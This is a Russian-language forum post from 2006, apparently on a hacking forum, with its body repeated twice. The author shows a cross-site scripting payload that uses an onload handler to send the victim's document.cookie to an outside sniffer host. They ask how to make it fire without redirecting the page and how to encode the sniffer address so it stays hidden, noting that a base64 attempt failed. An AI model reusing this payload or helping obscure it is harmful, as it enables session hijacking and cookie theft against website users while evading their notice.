alex-19841
07.05.2006, 02:44
onload='document.location="http://xss.ru/coc.gif?;"+document.cookie'
этот использует функцию onload
также можно
onmouseover
onmoseout
onerror
и т.д
Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location
Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало?
Также прочитал http://forum.antichat.ru/thread18719-xss.html
Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie
в base 64
aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ==
и когда это встовлял в
onload='document.location="aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ=='
То сниффер не срабатывал.
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
этот использует функцию onload
также можно
onmouseover
onmoseout
onerror
и т.д
Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location
Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало?
Также прочитал http://forum.antichat.ru/thread18719-xss.html
Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie
в base 64
aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ==
и когда это встовлял в
onload='document.location="aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ=='
То сниффер не срабатывал.
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?